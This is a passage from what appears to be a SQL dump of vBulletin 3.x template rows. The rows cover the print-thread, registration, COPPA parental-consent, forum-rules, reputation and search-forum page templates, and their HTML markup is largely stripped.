\r\n\r\n \r\n\r\n$postbits\r\n\r\n \r\n\r\n\r\n\r\n $vbphrase[all_times_are_gmt_x_time_now_is_y] \r\n \r\n $pagenav
\r\n \".(($show[\'pagenav\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n \r\n
\r\n\r\n\r\n $vbphrase[powered_by_vbulletin]\r\n \r\n \" . $GLOBALS[\'vbulletin\']->options[\'copyrighttext\'] . \"\r\n
\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n \r\n \r\n$vboptions[bbtitle] - $threadinfo[prefix_plain_html] $threadinfo[title] \r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n $pagenav
\r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n -
$foruminfo[title] \r\n (
$vboptions[bburl]/forumdisplay.php?f=$foruminfo[forumid] )\r\n
\r\n\r\n - - $threadinfo[prefix_rich]
$threadinfo[title] \r\n (
$vboptions[bburl]/showthread.php?t=$threadid )\r\n
\r\n\r\n \r\n\r\n$postbits\r\n\r\n \r\n\r\n\r\n\r\n $vbphrase[all_times_are_gmt_x_time_now_is_y] \r\n \r\n $pagenav
\r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n\r\n $vbphrase[powered_by_vbulletin]\r\n \r\n $vboptions[copyrighttext]\r\n
\r\n\r\n\r\n', 'template', 1195729860, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1537, -1, 'printthreadbit', '\r\n\r\n \r\n\r\n \r\n \r\n $post[username] \r\n $post[postdate] $post[posttime] \r\n \r\n
\r\n\r\n \r\n\r\n \".(($post[\'title\']) ? (\"\r\n $post[title]
\r\n \") : (\"\")).\"\r\n \".(($post[\'attach\']) ? (\"\r\n \" . construct_phrase(\"$vbphrase[x_attachments]\", \"$post[attach]\") . \"
\r\n \") : (\"\")).\"\r\n\r\n $post[message]
\r\n \r\n \r\n
\r\n ', '\r\n\r\n \r\n\r\n \r\n \r\n $post[username] \r\n $post[postdate] $post[posttime] \r\n \r\n
\r\n\r\n \r\n\r\n \r\n $post[title]
\r\n \r\n \r\n \r\n \r\n\r\n $post[message]
\r\n \r\n \r\n
\r\n ', 'template', 1070145486, 'vBulletin Solutions', '', 'vbulletin'),
(1538, -1, 'printthreadbit_ignore', '\r\n\r\n \r\n\r\n \r\n \r\n $post[username] \r\n $post[postdate] $post[posttime] \r\n \r\n
\r\n\r\n \r\n\r\n \".(($show[\'adminignore\']) ? (\"\r\n \r\n \" . construct_phrase(\"$vbphrase[administrator_decided_x_quiet]\", \"$post[username]\") . \"\r\n
\r\n \") : (\"\r\n \r\n \" . construct_phrase(\"$vbphrase[message_hidden_x_on_ignore_list]\", \"$post[username]\", \"profile.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=ignorelist\") . \"\r\n
\r\n \")).\"\r\n \r\n \r\n
\r\n ', '\r\n\r\n \r\n\r\n \r\n \r\n $post[username] \r\n $post[postdate] $post[posttime] \r\n \r\n
\r\n\r\n \r\n\r\n \r\n \r\n
$vbphrase[administrator_decided_x_quiet] \r\n
\r\n \r\n \r\n
$vbphrase[message_hidden_x_on_ignore_list] \r\n
\r\n \r\n \r\n \r\n
\r\n ', 'template', 1196095562, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1539, -1, 'register', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - \".(($show[\'coppa\']) ? (\"$vbphrase[coppa] \") : (\"\")).\"$vbphrase[registration] \r\n\r\n\r\n\r\n$header\r\n\r\n \r\n\r\n\".(($show[\'coppa\']) ? (\"\r\n $vbphrase[until_receive_signed_form]
\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'errors\']) ? (\"\r\n \r\n \r\n $vbphrase[errors_occurred_during_registration] \r\n \r\n \r\n \r\n \r\n
\r\n \r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n \r\n\".((!$show[\'birthday\']) ? (\"\r\n \r\n \r\n \r\n\") : (\"\")).\"\r\n\".(($show[\'coppa\']) ? (\"\r\n \r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n \" . construct_phrase(\"$vbphrase[register_at_x]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\") . \" \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n \" . construct_phrase(\"$vbphrase[to_post_must_first_register]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\") . \"\r\n
\r\n\r\n
\r\n
$vbphrase[username] :
\r\n
options[\'maxuserlength\'] . \"\\\" value=\\\"$username\\\" />
options[\'cleargifurl\'] . \"\\\" id=\\\"reg_verif_image\\\" onclick=\\\"return toggle_collapse(\'dialog_box\')\\\" style=\\\"display:none;\\\" alt=\\\"\\\" />\r\n
\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[password] \r\n \r\n \r\n\r\n
\r\n $vbphrase[email_address] \r\n \r\n \r\n\r\n $human_verify\r\n\r\n
\r\n
\r\n \r\n \r\n
\r\n \r\n\r\n\".(($show[\'customfields_profile\']) ? (\"\r\n\r\n\r\n $vbphrase[additional_required_information_profile] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n $customfields_profile\r\n\r\n \".(($show[\'birthday\']) ? (\"$birthdayfields\") : (\"\")).\"\r\n\r\n
\r\n
\r\n \r\n \r\n
\r\n \r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'customfields_option\']) ? (\"\r\n\r\n\r\n $vbphrase[additional_required_information_option] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n $customfields_option\r\n\r\n
\r\n
\r\n \r\n \r\n
\r\n \r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n $vbphrase[additional_information] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n \".(($show[\'referrer\']) ? (\"\r\n
\r\n $vbphrase[referrer] \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n $timezoneoptions\r\n\r\n
\r\n $vbphrase[receive_email] \r\n \r\n \r\n\r\n\r\n $customfields_other\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\r\n$vboptions[bbtitle] - $vbphrase[coppa] $vbphrase[registration] \r\n\r\n\r\n\r\n$header\r\n\r\n \r\n\r\n\r\n $vbphrase[until_receive_signed_form]
\r\n \r\n\r\n\r\n \r\n \r\n $vbphrase[errors_occurred_during_registration] \r\n \r\n \r\n \r\n \r\n
\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[register_at_x] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n
$vbphrase[to_post_must_first_register] \r\n
\r\n\r\n
\r\n
$vbphrase[username] :
\r\n
\r\n
\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[password] \r\n \r\n \r\n\r\n
\r\n $vbphrase[email_address] \r\n \r\n \r\n\r\n $human_verify\r\n\r\n
\r\n
\r\n \r\n \r\n
\r\n \r\n\r\n\r\n\r\n\r\n $vbphrase[additional_required_information_profile] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n $customfields_profile\r\n\r\n $birthdayfields \r\n\r\n
\r\n
\r\n \r\n \r\n
\r\n \r\n \r\n\r\n\r\n\r\n\r\n $vbphrase[additional_required_information_option] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n $customfields_option\r\n\r\n
\r\n
\r\n \r\n \r\n
\r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[additional_information] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n \r\n $vbphrase[referrer] \r\n \r\n \r\n \r\n\r\n $timezoneoptions\r\n\r\n
\r\n $vbphrase[receive_email] \r\n \r\n \r\n\r\n\r\n $customfields_other\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1232366235, 'vBulletin Solutions', '3.8.1', 'vbulletin'),
(1540, -1, 'register_coppaform', '$stylevar[htmldoctype]\r\n\r\n\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[parental_permission_required] \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \" . construct_phrase(\"$vbphrase[instructions_for_parent_guardian]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'companyname\'] . \"\", \"\" . $GLOBALS[\'vbulletin\']->options[\'faxnumber\'] . \"\", \"\" . $GLOBALS[\'vbulletin\']->options[\'address\'] . \"\") . \"\r\n
\r\n\r\n\r\n\r\n\r\n $vbphrase[required_information] \r\n \r\n\r\n $vbphrase[username] \r\n \" . $GLOBALS[\'vbulletin\']->userinfo[\'username\'] . \" \r\n \r\n\r\n $vbphrase[email_address] \r\n \" . $GLOBALS[\'vbulletin\']->userinfo[\'email\'] . \" \r\n \r\n\r\n $vbphrase[optional_information] \r\n \r\n\r\n \r\n $vbphrase[make_changes_profile_visit]: \r\n options[\'bburl\'] . \"/profile.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=editprofile\\\">\" . $GLOBALS[\'vbulletin\']->options[\'bburl\'] . \"/profile.php?do=editprofile \r\n \r\n \r\n\r\n $vbphrase[home_page] \r\n \" . $GLOBALS[\'vbulletin\']->userinfo[\'homepage\'] . \" \r\n \r\n\r\n $vbphrase[signature] \r\n \" . $GLOBALS[\'vbulletin\']->userinfo[\'signature\'] . \" \r\n \r\n\r\n \r\n $vbphrase[privacy_mode] \r\n $vbphrase[yes_hides_email_icq_etc]
\r\n \r\n \" . $GLOBALS[\'vbulletin\']->userinfo[\'showemail\'] . \" \r\n \r\n\r\n $vbphrase[icq_number] \r\n \" . $GLOBALS[\'vbulletin\']->userinfo[\'icq\'] . \" \r\n \r\n\r\n $vbphrase[aim_screen_name] \r\n \" . $GLOBALS[\'vbulletin\']->userinfo[\'aim\'] . \" \r\n \r\n\r\n $vbphrase[yahoo_messenger_handle] \r\n \" . $GLOBALS[\'vbulletin\']->userinfo[\'yahoo\'] . \" \r\n \r\n\r\n $vbphrase[msn_messenger_handle] \r\n \" . $GLOBALS[\'vbulletin\']->userinfo[\'msn\'] . \" \r\n \r\n\r\n $vbphrase[skype_name] \r\n \" . $GLOBALS[\'vbulletin\']->userinfo[\'skype\'] . \" \r\n \r\n\r\n \r\n \".(($GLOBALS[\'vbulletin\']->options[\'privacyurl\']) ? (\"\" . construct_phrase(\"$vbphrase[sign_form_and_send_with_privacy]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'privacyurl\'] . \"\") . \"\") : (\"$vbphrase[sign_form_and_send_without_privacy]\")).\" \r\n \r\n \r\n\r\n $vbphrase[parent_guardian_full_name] \r\n \r\n \r\n\r\n $vbphrase[relation_to_child] \r\n \r\n \r\n\r\n $vbphrase[telephone_number] \r\n \r\n \r\n\r\n $vbphrase[email_address] \r\n \" . $GLOBALS[\'vbulletin\']->userinfo[\'parentemail\'] . \" \r\n \r\n\r\n $vbphrase[parent_signature] \r\n \r\n \r\n\r\n $vbphrase[date] \r\n \r\n \r\n\r\n \" . construct_phrase(\"$vbphrase[contact_webmaster_questions]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'contactuslink\'] . \"\") . \" \r\n \r\n
\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$vboptions[bbtitle] - $vbphrase[parental_permission_required] \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n $vbphrase[permission_to_participate_at_x] \r\n \r\n
\r\n\r\n\r\n\r\n $vbphrase[instructions_for_parent_guardian] \r\n
\r\n\r\n\r\n\r\n\r\n $vbphrase[required_information] \r\n \r\n\r\n $vbphrase[username] \r\n $bbuserinfo[username] \r\n \r\n\r\n $vbphrase[email_address] \r\n $bbuserinfo[email] \r\n \r\n\r\n $vbphrase[optional_information] \r\n \r\n\r\n \r\n $vbphrase[make_changes_profile_visit]: \r\n $vboptions[bburl]/profile.php?do=editprofile \r\n \r\n \r\n\r\n $vbphrase[home_page] \r\n $bbuserinfo[homepage] \r\n \r\n\r\n $vbphrase[signature] \r\n $bbuserinfo[signature] \r\n \r\n\r\n \r\n $vbphrase[privacy_mode] \r\n $vbphrase[yes_hides_email_icq_etc]
\r\n \r\n $bbuserinfo[showemail] \r\n \r\n\r\n $vbphrase[icq_number] \r\n $bbuserinfo[icq] \r\n \r\n\r\n $vbphrase[aim_screen_name] \r\n $bbuserinfo[aim] \r\n \r\n\r\n $vbphrase[yahoo_messenger_handle] \r\n $bbuserinfo[yahoo] \r\n \r\n\r\n $vbphrase[msn_messenger_handle] \r\n $bbuserinfo[msn] \r\n \r\n\r\n $vbphrase[skype_name] \r\n $bbuserinfo[skype] \r\n \r\n\r\n \r\n $vbphrase[sign_form_and_send_with_privacy] $vbphrase[sign_form_and_send_without_privacy] \r\n \r\n \r\n\r\n $vbphrase[parent_guardian_full_name] \r\n \r\n \r\n\r\n $vbphrase[relation_to_child] \r\n \r\n \r\n\r\n $vbphrase[telephone_number] \r\n \r\n \r\n\r\n $vbphrase[email_address] \r\n $bbuserinfo[parentemail] \r\n \r\n\r\n $vbphrase[parent_signature] \r\n \r\n \r\n\r\n $vbphrase[date] \r\n \r\n \r\n\r\n $vbphrase[contact_webmaster_questions] \r\n \r\n
\r\n\r\n\r\n', 'template', 1198801103, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'),
(1541, -1, 'register_rules', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - \".(($show[\'coppa\']) ? (\"$vbphrase[coppa_rules]\") : (\"$vbphrase[forum_rules]\")).\" \r\n\r\n\r\n$header\r\n\r\n \r\n \r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n \r\n\".(($show[\'coppa\']) ? (\"\r\n \r\n\") : (\"\r\n \r\n\")).\"\r\n\r\n\r\n\r\n \" . construct_phrase(\"$vbphrase[x_rules]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\") . \" \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[forum_rules] \r\n \r\n \r\n $vbphrase[to_proceed_must_agree] \r\n \r\n \r\n \r\n \r\n\r\n \".(($show[\'coppa\']) ? (\"\r\n \r\n
$vbphrase[coppa_policy]
\r\n\r\n \" . construct_phrase(\"$vbphrase[coppa_rules_description]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\", \"\" . $GLOBALS[\'vbulletin\']->options[\'forumhome\'] . \".php\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl_q\'] . \"\", \"register.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=coppaform\", \"\" . $GLOBALS[\'vbulletin\']->options[\'webmasteremail\'] . \"\") . \"\r\n \r\n \") : (\"\")).\"\r\n\r\n \r\n \" . construct_phrase(\"$vbphrase[forum_rules_registration]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'forumhome\'] . \".php\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl_q\'] . \"\", \"\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\") . \"\r\n \" . construct_phrase(\"$vbphrase[forum_rules_description]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'forumhome\'] . \".php\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl_q\'] . \"\", \"\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\") . \"\r\n \r\n\r\n
\r\n \" . construct_phrase(\"$vbphrase[read_agree_abide_by_rules]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\") . \"
\r\n \r\n \r\n
\r\n \r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n \r\n \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[coppa_rules] $vbphrase[forum_rules] \r\n\r\n\r\n$header\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[x_rules] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[forum_rules] \r\n \r\n \r\n $vbphrase[to_proceed_must_agree] \r\n \r\n \r\n \r\n height:175px; overflow:auto\">\r\n\r\n
\r\n \r\n $vbphrase[coppa_policy]
\r\n\r\n $vbphrase[coppa_rules_description] \r\n \r\n \r\n\r\n \r\n
$vbphrase[forum_rules_registration] \r\n
$vbphrase[forum_rules_description] \r\n \r\n\r\n
\r\n \r\n \r\n \r\n
\r\n \r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n \r\n \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1220350057, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1542, -1, 'register_verify_age', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[register] \r\n\r\n\r\n\r\n$header\r\n\r\n \r\n \r\n\r\n\r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n\r\n\r\n \" . construct_phrase(\"$vbphrase[register_at_x]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\") . \" \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[please_enter_your_date_of_birth] \r\n \r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n \r\n \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n $vboptions[bbtitle] - $vbphrase[register] \r\n\r\n\r\n\r\n$header\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[register_at_x] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[please_enter_your_date_of_birth] \r\n \r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n \r\n \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208876529, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1543, -1, 'reputation', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[reputation] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n $vbphrase[reputation] \r\n \r\n$reputationbit\r\n
\r\n \r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[reputation] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n $vbphrase[reputation] \r\n \r\n$reputationbit\r\n
\r\n \r\n\r\n$footer\r\n\r\n', 'template', 1195729860, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1544, -1, 'reputationbit', '\r\n $vbphrase[add_to_reputation]: $userinfo[username] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n \" . construct_phrase(\"$vbphrase[what_do_you_think_of_xs_post]\", \"$userinfo[username]\") . \" \r\n \r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n
\r\n \r\n ', '\r\n $vbphrase[add_to_reputation]: $userinfo[username] \r\n \r\n\r\n \r\n \r\n
style=\"width:$stylevar[formwidth]\" align=\"$stylevar[left]\">\r\n\r\n
\r\n $vbphrase[what_do_you_think_of_xs_post] \r\n \r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n \r\n ', 'template', 1208960545, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1545, -1, 'reputation_ajax', '\r\n\r\n $vbphrase[reputation] \r\n \r\n$reputationbit\r\n
', '\r\n\r\n $vbphrase[reputation] \r\n \r\n$reputationbit\r\n
', 'template', 1265387840, 'vBulletin Solutions', '3.8.5', 'vbulletin'),
(1546, -1, 'reputation_reasonbits', '\r\n \r\n $reason \r\n \r\n', '\r\n \r\n $reason \r\n \r\n', 'template', 1069256457, 'vBulletin Solutions', '', 'vbulletin'),
(1547, -1, 'reputation_yourpost', '\r\n \" . construct_phrase(\"$vbphrase[reputation_on_post_is_x]\", \"showthread.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"p=$postid#post$postid\", \"$reputation\") . \" \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[comments_on_this_post] \r\n \r\n $reputation_reasonbits\r\n
\r\n \r\n\r\n
\" . construct_phrase(\"$vbphrase[you_have_x_reputation_points]\", \"\" . $GLOBALS[\'vbulletin\']->userinfo[\'reputation\'] . \"\") . \"
\r\n\r\n
\r\n
\r\n \r\n ', '\r\n $vbphrase[reputation_on_post_is_x] \r\n \r\n\r\n \r\n \r\n
style=\"width:$stylevar[formwidth]\" align=\"$stylevar[left]\">\r\n\r\n
\r\n $vbphrase[comments_on_this_post] \r\n \r\n $reputation_reasonbits\r\n
\r\n \r\n\r\n
$vbphrase[you_have_x_reputation_points] \r\n\r\n
\r\n
\r\n \r\n ', 'template', 1147900455, 'vBulletin Solutions', '3.6.0 Beta 1', 'vbulletin'),
(1548, -1, 'search_forums', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - \".(($show[\'searchthread\']) ? (\"$vbphrase[search_thread]\") : (\"$vbphrase[search_forums]\")).\" \r\n$tag_cloud_headinclude\r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($show[\'errors\']) ? (\"\r\n\r\n\r\n \r\n $vbphrase[errors_occured_with_search]:\r\n \r\n \r\n\r\n \r\n $errorlist \r\n \r\n \r\n
\r\n\r\n \r\n\") : (\"\")).\"\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n\r\n\r\n \r\n \".(($show[\'searchthread\']) ? (\"$vbphrase[search_thread] - session->vars[\'sessionurl\'] . \"t=$threadinfo[threadid]\\\">$threadinfo[title] \") : (\"$vbphrase[search_forums]\")).\"\r\n \r\n \r\n\r\n \r\n\r\n \r\n \r\n \r\n \r\n $vbphrase[search_by_key_word] \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[search_by_user_name] \r\n \r\n \r\n\r\n \r\n \r\n \".(($human_verify) ? (\"\r\n \r\n $human_verify \r\n \r\n \") : (\"\")).\"\r\n
\r\n\r\n \r\n\r\n
\r\n
\r\n $vbphrase[search_options]\r\n
\r\n\r\n
\r\n
\r\n \r\n \r\n \".((!$show[\'searchthread\']) ? (\"\r\n \".(($prefix_options) ? (\"\r\n \r\n $vbphrase[find_threads_with_prefix] \r\n \r\n
\r\n \r\n $vbphrase[any_prefix_meta] \r\n $vbphrase[no_prefix_meta] \r\n $prefix_options\r\n \r\n
\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n \r\n $vbphrase[find_threads_with] \r\n \r\n \r\n $vbphrase[at_least] \r\n $vbphrase[at_most] \r\n \r\n $vbphrase[replies]\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n \r\n $vbphrase[find_posts_from] \r\n \r\n \r\n $vbphrase[any_date] \r\n $vbphrase[your_last_visit] \r\n $vbphrase[yesterday] \r\n $vbphrase[a_week_ago] \r\n \" . construct_phrase(\"$vbphrase[x_weeks_ago]\", \"2\") . \" \r\n $vbphrase[a_month_ago] \r\n \" . construct_phrase(\"$vbphrase[x_months_ago]\", \"3\") . \" \r\n \" . construct_phrase(\"$vbphrase[x_months_ago]\", \"6\") . \" \r\n $vbphrase[a_year_ago] \r\n \r\n \r\n $vbphrase[and_newer] \r\n $vbphrase[and_older] \r\n \r\n
\r\n \r\n\r\n \".((!$show[\'searchthread\']) ? (\"\r\n \r\n $vbphrase[sort_results_by] \r\n \r\n \r\n $vbphrase[relevancy] \r\n $vbphrase[title] \r\n $vbphrase[number_of_replies] \r\n $vbphrase[number_of_views] \r\n $vbphrase[thread_start_date] \r\n $vbphrase[last_posting_date] \r\n $vbphrase[username] \r\n $vbphrase[forum] \r\n \r\n \r\n $vbphrase[in_descending_order] \r\n $vbphrase[in_ascending_order] \r\n \r\n
\r\n \r\n\r\n \r\n $vbphrase[show_results_as] \r\n \r\n $vbphrase[threads] \r\n $vbphrase[posts] \r\n
\r\n \r\n \") : (\"\")).\"\r\n \r\n \".((!$show[\'searchthread\']) ? (\"\r\n \r\n \".(($show[\'tag_option\']) ? (\"\r\n \r\n $vbphrase[search_by_tag] \r\n \r\n
$vbphrase[tag]:
\r\n
\r\n\r\n \".(($show[\'popups\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n \r\n $vbphrase[search_in_forums] \r\n \r\n
\r\n \r\n $vbphrase[search_all_open_forums] \r\n $vbphrase[search_subscribed_forums] \r\n $searchforumbits\r\n \r\n
\r\n
$vbphrase[also_search_in_child_forums]
\r\n \".(($show[\'cantsearchposts\']) ? (\"$vbphrase[you_can_only_search_thread_titles]\") : (\"\")).\"\r\n
\r\n \r\n \r\n \") : (\"\")).\"\r\n \r\n
\r\n
\r\n\r\n
\r\n\r\n \r\n \r\n session->vars[\'sessionurl\'] . \"type=advanced\';\\\" />\r\n
\r\n \r\n \r\n
\r\n\r\n\".(($show[\'member\']) ? (\"\r\n \r\n \r\n $vbphrase[save_search_preferences] \r\n $vbphrase[clear_search_preferences] \r\n \r\n \r\n options[\'cleargifurl\'] . \"\\\" style=\\\"width: 1px; height: 1px;\\\" />\r\n \r\n \r\n
\r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n\".(($tag_cloud) ? (\"\r\n $tag_cloud
\r\n\") : (\"\")).\"\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[search_thread] $vbphrase[search_forums] \r\n$tag_cloud_headinclude\r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n \r\n $vbphrase[errors_occured_with_search]:\r\n \r\n \r\n\r\n \r\n $errorlist \r\n \r\n \r\n
\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n $vbphrase[search_thread] - $threadinfo[title] $vbphrase[search_forums] \r\n \r\n \r\n\r\n \r\n\r\n \r\n \r\n \r\n \r\n $vbphrase[search_by_key_word] \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[search_by_user_name] \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n $human_verify \r\n \r\n \r\n
\r\n\r\n \r\n\r\n
\r\n
\r\n $vbphrase[search_options]\r\n
\r\n\r\n
\r\n
\r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[find_threads_with_prefix] \r\n \r\n
\r\n min-width:250px width:100%\" name=\"prefixchoice[]\" size=\"5\" multiple=\"multiple\">\r\n $vbphrase[any_prefix_meta] \r\n $vbphrase[no_prefix_meta] \r\n $prefix_options\r\n \r\n
\r\n
\r\n \r\n \r\n\r\n \r\n $vbphrase[find_threads_with] \r\n \r\n \r\n $vbphrase[at_least] \r\n $vbphrase[at_most] \r\n \r\n $vbphrase[replies]\r\n
\r\n \r\n \r\n\r\n \r\n $vbphrase[find_posts_from] \r\n \r\n
\r\n $vbphrase[any_date] \r\n $vbphrase[your_last_visit] \r\n $vbphrase[yesterday] \r\n $vbphrase[a_week_ago] \r\n $vbphrase[x_weeks_ago] \r\n $vbphrase[a_month_ago] \r\n $vbphrase[x_months_ago] \r\n $vbphrase[x_months_ago] \r\n $vbphrase[a_year_ago] \r\n \r\n
\r\n $vbphrase[and_newer] \r\n $vbphrase[and_older] \r\n \r\n
\r\n \r\n\r\n \r\n \r\n $vbphrase[sort_results_by] \r\n \r\n \r\n $vbphrase[relevancy] \r\n $vbphrase[title] \r\n $vbphrase[number_of_replies] \r\n $vbphrase[number_of_views] \r\n $vbphrase[thread_start_date] \r\n $vbphrase[last_posting_date] \r\n $vbphrase[username] \r\n $vbphrase[forum] \r\n \r\n \r\n $vbphrase[in_descending_order] \r\n $vbphrase[in_ascending_order] \r\n \r\n
